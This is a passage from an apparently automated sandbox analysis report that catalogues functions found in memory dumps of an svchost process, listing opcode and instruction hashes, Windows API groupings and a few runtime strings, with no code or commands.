                                                  • Instruction Fuzzy Hash: 43F05458F04B80D2EEC46F92FA2815B5274A74CFC0F445030EF1647B1ACEACC445C700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.3355105286.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                  • Associated: 00000011.00000002.3354416817.0000022F4B920000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3355926032.0000022F4B935000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3356680592.0000022F4B940000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3357400152.0000022F4B942000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3358068813.0000022F4B949000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_22f4b920000_svchost.jbxd
                                                  Similarity
                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                  • String ID: CorExitProcess$mscoree.dll
                                                  • API String ID: 4061214504-1276376045
                                                  • Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                                                  • Instruction ID: a04504cd0d85b7767a6ae057d92d07373024f35898ec03b55c9c901403f2537f
                                                  • Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                                                  • Instruction Fuzzy Hash: 1FF09629A0470161FA94AF94D9A935B2370EB4D7A4F541639DB6A451E6CFACC448C700
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.3355105286.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                  • Associated: 00000011.00000002.3354416817.0000022F4B920000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3355926032.0000022F4B935000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3356680592.0000022F4B940000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3357400152.0000022F4B942000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3358068813.0000022F4B949000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_22f4b920000_svchost.jbxd
                                                  Similarity
                                                  • API ID: CurrentThread
                                                  • String ID:
                                                  • API String ID: 2882836952-0
                                                  • Opcode ID: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
                                                  • Instruction ID: 8cf9ec95656e8e5e87e39a662f5ad30ac03dab08b7211d00651beb1416509c21
                                                  • Opcode Fuzzy Hash: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
                                                  • Instruction Fuzzy Hash: E202EA36919B8096EBA4DF55E5A435BB7B0F384794F104435EB8E87B6ADBBCC484CB00
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.3355105286.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                  • Associated: 00000011.00000002.3354416817.0000022F4B920000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3355926032.0000022F4B935000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3356680592.0000022F4B940000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3357400152.0000022F4B942000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3358068813.0000022F4B949000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_22f4b920000_svchost.jbxd
                                                  Similarity
                                                  • API ID: Value
                                                  • String ID:
                                                  • API String ID: 3702945584-0
                                                  • Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                                                  • Instruction ID: e299e2d91b18ef67838866c18cdec6bfca9fe4556afd804b4f662d50e4966460
                                                  • Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                                                  • Instruction Fuzzy Hash: 2D51C239E04610A7E7A8EF96E96865B77B0F388B80F104939DF4A43756DBBCC945C700
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.3355105286.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                  • Associated: 00000011.00000002.3354416817.0000022F4B920000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3355926032.0000022F4B935000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3356680592.0000022F4B940000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3357400152.0000022F4B942000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3358068813.0000022F4B949000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_22f4b920000_svchost.jbxd
                                                  Similarity
                                                  • API ID: Value
                                                  • String ID:
                                                  • API String ID: 3702945584-0
                                                  • Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                                  • Instruction ID: d34dbc50e84e899d59484e42c8476de88141fb153c2056850e267d03047b682d
                                                  • Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                                  • Instruction Fuzzy Hash: 0851A439E14611A7E7A8EFA6E96861B73B0F389B80F104938DF4A43755DFB8C845CB00
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.3355105286.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                  • Associated: 00000011.00000002.3354416817.0000022F4B920000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3355926032.0000022F4B935000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3356680592.0000022F4B940000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3357400152.0000022F4B942000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3358068813.0000022F4B949000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_22f4b920000_svchost.jbxd
                                                  Similarity
                                                  • API ID: CurrentThread
                                                  • String ID:
                                                  • API String ID: 2882836952-0
                                                  • Opcode ID: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                                                  • Instruction ID: d0868c2d9cf30e478813b9fe480cab2c66c994ec008eb639b9f6d8edd7a6fe81
                                                  • Opcode Fuzzy Hash: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                                                  • Instruction Fuzzy Hash: 4561CC3A929A4096F7E49FA5E56831BB7B1F388744F100535EB8D43BAADBBCC540CB00
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.3355105286.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                  • Associated: 00000011.00000002.3354416817.0000022F4B920000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3355926032.0000022F4B935000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3356680592.0000022F4B940000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3357400152.0000022F4B942000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3358068813.0000022F4B949000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_22f4b920000_svchost.jbxd
                                                  Similarity
                                                  • API ID: CurrentProcessProtectVirtual$HandleModule
                                                  • String ID:
                                                  • API String ID: 1092925422-0
                                                  • Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                                  • Instruction ID: b3c1c112d2e11a003287798bdc41f0482b20c7cd380c6116318526b11c9f8f77
                                                  • Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                                  • Instruction Fuzzy Hash: 60113A2AE08740A7FBA4AF61E55825A77B0FB49B80F140436DB4D037A9EBADC944C781
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.3355105286.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                  • Associated: 00000011.00000002.3354416817.0000022F4B920000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3355926032.0000022F4B935000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3356680592.0000022F4B940000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3357400152.0000022F4B942000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3358068813.0000022F4B949000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_22f4b920000_svchost.jbxd
                                                  Similarity
                                                  • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                  • String ID: csm
                                                  • API String ID: 2395640692-1018135373
                                                  • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                  • Instruction ID: 7cb284ad2bbe1a30e649e4dd8f8e8b9c1cc85bb7e2b6f127796852b835166346
                                                  • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                  • Instruction Fuzzy Hash: D851D33AF01600AAEB98EF55E1A876E37A1EB54B88F048930DF494778AD7BCC845C700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000003.1646195511.0000022F4B8F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000022F4B8F0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_3_22f4b8f0000_svchost.jbxd
                                                  Similarity
                                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                  • String ID: csm$csm
                                                  • API String ID: 3896166516-3733052814
                                                  • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                  • Instruction ID: 622ab557142c9faff67b5bb53c6bde86df1ea76d362581bbbeddfaa336dc5a18
                                                  • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                  • Instruction Fuzzy Hash: 9651A63AA00340D6EBB4AF91E248B5A77B0F394B9AF144135DB4947BD6EBB8C453CB01
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.3355105286.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                  • Associated: 00000011.00000002.3354416817.0000022F4B920000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3355926032.0000022F4B935000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3356680592.0000022F4B940000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3357400152.0000022F4B942000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3358068813.0000022F4B949000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_22f4b920000_svchost.jbxd
                                                  Similarity
                                                  • API ID: CallEncodePointerTranslator
                                                  • String ID: MOC$RCC
                                                  • API String ID: 3544855599-2084237596
                                                  • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                  • Instruction ID: 2519287d322944cfd7feb94d4905a80ad8ecedd1afd163043e9b4c01a4f3e364
                                                  • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                  • Instruction Fuzzy Hash: 5A61C13BD04BC491EBA8AF55E55539AB7B0F794B94F044A35EB8813B96CBBCC091CB00
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.3355105286.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                  • Associated: 00000011.00000002.3354416817.0000022F4B920000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3355926032.0000022F4B935000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3356680592.0000022F4B940000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3357400152.0000022F4B942000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3358068813.0000022F4B949000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_22f4b920000_svchost.jbxd
                                                  Similarity
                                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                  • String ID: csm$csm
                                                  • API String ID: 3896166516-3733052814
                                                  • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                  • Instruction ID: c13a4aa0f0c44daca869980378c499b26511675fa44cc9a95517fb1184cc627c
                                                  • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                  • Instruction Fuzzy Hash: 5C518E3BD00740ABFBA8AFA1D66835A77B0E354B94F1449359B8947B96C7BCC452CB01
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.3355105286.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                  • Associated: 00000011.00000002.3354416817.0000022F4B920000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3355926032.0000022F4B935000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3356680592.0000022F4B940000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3357400152.0000022F4B942000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3358068813.0000022F4B949000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_22f4b920000_svchost.jbxd
                                                  Similarity
                                                  • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                  • String ID: pid_
                                                  • API String ID: 517849248-4147670505
                                                  • Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                                  • Instruction ID: ab322a2d4964e99f23f1116aef8ef54fab78dd75f398024ce987d62f44f25bf3
                                                  • Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                                  • Instruction Fuzzy Hash: B411A519F14B81B2FB94AFA5EA2939B63B4F748740F8108319B4D83696EFACC915C700
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.3355105286.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                  • Associated: 00000011.00000002.3354416817.0000022F4B920000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3355926032.0000022F4B935000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3356680592.0000022F4B940000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3357400152.0000022F4B942000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3358068813.0000022F4B949000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_22f4b920000_svchost.jbxd
                                                  Similarity
                                                  • API ID: FileWrite$ConsoleErrorLastOutput
                                                  • String ID:
                                                  • API String ID: 2718003287-0
                                                  • Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                                  • Instruction ID: 65ab33f9e86a3793016190f554dd470263d197bad517fea0e7f9cd5ea5b1132a
                                                  • Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                                  • Instruction Fuzzy Hash: 98D1FF36B14A80A9EB94DFA5D6683DE37B1F349B98F405236CF4D97B9ADA74C006C340
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.3355105286.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                  • Associated: 00000011.00000002.3354416817.0000022F4B920000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3355926032.0000022F4B935000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3356680592.0000022F4B940000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3357400152.0000022F4B942000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3358068813.0000022F4B949000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_22f4b920000_svchost.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$Free
                                                  • String ID:
                                                  • API String ID: 3168794593-0
                                                  • Opcode ID: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                                                  • Instruction ID: 56e8b8fcdf47366c570304169e9c02a7fee4cc887c1613258ea6998d8deb5e52
                                                  • Opcode Fuzzy Hash: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                                                  • Instruction Fuzzy Hash: 01015736A10B90EAE794EFE6E92814A77B1F78CF80B099035DF4943729DE78D461C740
                                                  APIs
                                                  • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,0000022F4B9328DF), ref: 0000022F4B932A12
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.3355105286.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                  • Associated: 00000011.00000002.3354416817.0000022F4B920000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3355926032.0000022F4B935000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3356680592.0000022F4B940000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3357400152.0000022F4B942000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3358068813.0000022F4B949000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_22f4b920000_svchost.jbxd
                                                  Similarity
                                                  • API ID: ConsoleMode
                                                  • String ID:
                                                  • API String ID: 4145635619-0
                                                  • Opcode ID: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                                                  • Instruction ID: a05a13cbd6c50fc86814b52849a412da34fb816029a598fb177ae6ce372f8a44
                                                  • Opcode Fuzzy Hash: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                                                  • Instruction Fuzzy Hash: 1791F63AE10654A5FF98AFA5D6783AE3BB0F34DB88F546139DF0A53686CAB4C445C300
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.3355105286.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                  • Associated: 00000011.00000002.3354416817.0000022F4B920000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3355926032.0000022F4B935000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3356680592.0000022F4B940000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3357400152.0000022F4B942000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3358068813.0000022F4B949000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_22f4b920000_svchost.jbxd
                                                  Similarity
                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                  • String ID:
                                                  • API String ID: 2933794660-0
                                                  • Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                                                  • Instruction ID: 7315c7c0fdf0fd24ccb5326225aca3ef93bf920e04fc4ac136ff2fecd1a1c651
                                                  • Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                                                  • Instruction Fuzzy Hash: 64115E2AB10F009AEB80DFA0E9683A933B4F71D758F441E31DB6D427A5DBB8C194C340
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.3355105286.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                  • Associated: 00000011.00000002.3354416817.0000022F4B920000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3355926032.0000022F4B935000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3356680592.0000022F4B940000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3357400152.0000022F4B942000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3358068813.0000022F4B949000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_22f4b920000_svchost.jbxd
                                                  Similarity
                                                  • API ID: FileType
                                                  • String ID: \\.\pipe\
                                                  • API String ID: 3081899298-91387939
                                                  • Opcode ID: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                                                  • Instruction ID: 69b0edfe0cb17288d0b0df2ba938852f381a9f43c30d0951323d7d8a6a24af5e
                                                  • Opcode Fuzzy Hash: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                                                  • Instruction Fuzzy Hash: 0071832AE04B4165FFBCAEA6DA683AB77B4F345784F510836DF0947B96DAB8C500C740
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000003.1646195511.0000022F4B8F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000022F4B8F0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_3_22f4b8f0000_svchost.jbxd
                                                  Similarity
                                                  • API ID: CurrentImageNonwritable__except_validate_context_record
                                                  • String ID: csm
                                                  • API String ID: 3242871069-1018135373
                                                  • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                  • Instruction ID: 9d5e0100f5ffe4596352da2ba97978141a35c5f3890224abb4ce1ccde644c2fd
                                                  • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                  • Instruction Fuzzy Hash: A951D23AB11A05EADB94EF95D54CF6E33B1F344B89F1542319B464778AE7B8D882C700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000003.1646195511.0000022F4B8F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000022F4B8F0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_3_22f4b8f0000_svchost.jbxd
                                                  Similarity
                                                  • API ID: CallTranslator
                                                  • String ID: MOC$RCC
                                                  • API String ID: 3163161869-2084237596
                                                  • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                  • Instruction ID: eb72844637493c4f102b5757175871491ca948ddf3b39f32b9f3a56f7479e12c
                                                  • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                  • Instruction Fuzzy Hash: FE61C236904BC491DBB0AF55E544B9AB7B0F795BC9F144235EB9807B96EBBCC091CB00
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.3355105286.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                  • Associated: 00000011.00000002.3354416817.0000022F4B920000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3355926032.0000022F4B935000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3356680592.0000022F4B940000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3357400152.0000022F4B942000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3358068813.0000022F4B949000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_22f4b920000_svchost.jbxd
                                                  Similarity
                                                  • API ID: FileType
                                                  • String ID: \\.\pipe\
                                                  • API String ID: 3081899298-91387939
                                                  • Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                                                  • Instruction ID: dff5c28ae23f6fb28725aba5b6bbbfb6d753e5a829e45e780184bca63f5c3eae
                                                  • Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                                                  • Instruction Fuzzy Hash: 5451E62AE0878061FEACAEA5E66C3AB7775F394740F040835CF4943B6ADABDD400CB40
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.3355105286.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                  • Associated: 00000011.00000002.3354416817.0000022F4B920000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3355926032.0000022F4B935000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3356680592.0000022F4B940000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3357400152.0000022F4B942000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3358068813.0000022F4B949000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_22f4b920000_svchost.jbxd
                                                  Similarity
                                                  • API ID: ErrorFileLastWrite
                                                  • String ID: U
                                                  • API String ID: 442123175-4171548499
                                                  • Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                                  • Instruction ID: 27cf9f434496b3bd170b431ba0fea5b332a09b693fd3e9a843dce89e3fca500e
                                                  • Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                                  • Instruction Fuzzy Hash: 61411636A25A80A6EB90EFA5E55879BB7B0F34C784F401032EF4D87759EBB8C441CB40
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.3355105286.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                  • Associated: 00000011.00000002.3354416817.0000022F4B920000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3355926032.0000022F4B935000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3356680592.0000022F4B940000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3357400152.0000022F4B942000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3358068813.0000022F4B949000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_22f4b920000_svchost.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFileHeaderRaise
                                                  • String ID: csm
                                                  • API String ID: 2573137834-1018135373
                                                  • Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                                  • Instruction ID: 7368844f5f46a0da056b2b14b5b0993db77552c27402f613873d14bbf342e81d
                                                  • Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                                  • Instruction Fuzzy Hash: 08117936A04B8092EBA49F15F51824AB7E1F798B84F188634EF8D07B66DF7CC551CB00
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.3355105286.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                  • Associated: 00000011.00000002.3354416817.0000022F4B920000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3355926032.0000022F4B935000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3356680592.0000022F4B940000.00000004.00000001.00020000.00000000.sdmp
